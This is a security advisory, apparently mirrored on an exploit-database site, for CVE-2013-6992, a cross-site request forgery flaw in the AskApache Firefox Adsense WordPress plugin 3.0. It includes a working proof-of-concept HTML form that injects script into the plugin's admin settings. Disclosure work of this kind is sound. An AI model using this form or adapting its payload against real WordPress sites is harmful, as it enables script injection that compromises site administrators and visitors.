Lucene search
High-Tech Bridge1337DAY-ID-21717HistoryDec 27, 2013 - 12:00 a.m.
AskApache 3.0 Cross Site Request Forgery Vulnerability
2013-12-2700:00:00
High-Tech Bridge
0day.today
27
0.004 Low
EPSS
Percentile
71.3%
AskApache Firefox Adsense WordPress plugin version 3.0 suffers from a cross site request forgery vulnerability.
Product: AskApache Firefox Adsense Wordpress plugin
Vendor: AskApache
Vulnerable Version(s): 3.0 and probably prior
Tested Version: 3.0
Advisory Publication: December 5, 2013 [without technical details]
Vendor Notification: December 5, 2013
Public Disclosure: December 26, 2013
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2013-6992
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Not Fixed
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in AskApache Firefox Adsense Wordpress plugin, which can be exploited to perform Сross-Site Request Forgery (CSRF) attacks.
1) Сross-Site Request Forgery (CSRF) in AskApache Firefox Adsense Wordpress plugin: CVE-2013-6992
The vulnerability exists due to insufficient verification of the HTTP request origin in "/wp-admin/options-general.php" script. A remote attacker can trick a logged-in administrator to visit a specially crafted page with CSRF exploit, inject and execute arbitrary HTML and script code in administrator’s browser in context of vulnerable website.
The exploitation example below injects JavaScript code, which uses the "alert()" function to display "immuniweb" word:
<form action="http://[host]/wp-admin/options-general.php?page=askapache-firefox-adsense.php" method="post" name="main">
<input type="hidden" name="aafireadcode" value='<script>alert("immuniweb");</script>'>
<input type="submit" id="btn">
</form>
-----------------------------------------------------------------------------------------------
Solution:
Disable the vulnerable plugin.
On 2013-12-06 vendor replied to our notification that he will not support the plugin anymore, and proposed to remove the vulnerable plugin as the official solution. The vendor has also taken steps to remove this plugin from WordPress.org.
# 0day.today [2018-04-02] #Related
cve
cve
CVE-2013-6992
2014-01-03 18:54:00
prion
prion
Cross site request forgery (csrf)
2014-01-03 18:54:00
wpvulndb
wpvulndb
AskApache Firefox Adsense 3.0 - Unspecified CSRF
2014-08-01 10:59:07
packetstorm
packetstorm
AskApache 3.0 Cross Site Request Forgery
2013-12-26 00:00:00
patchstack
patchstack
WordPress Firefox Adsense Plugin <= 3.0 - CSRF and XSS
2013-12-06 00:00:00
securityvulns
securityvulns
seebug
seebug
Wordpress AskApache Firefox Adsense插件跨站请求伪造漏洞
2013-12-27 00:00:00
htbridge
htbridge
cvelist
cvelist
CVE-2013-6992
2014-01-02 15:00:00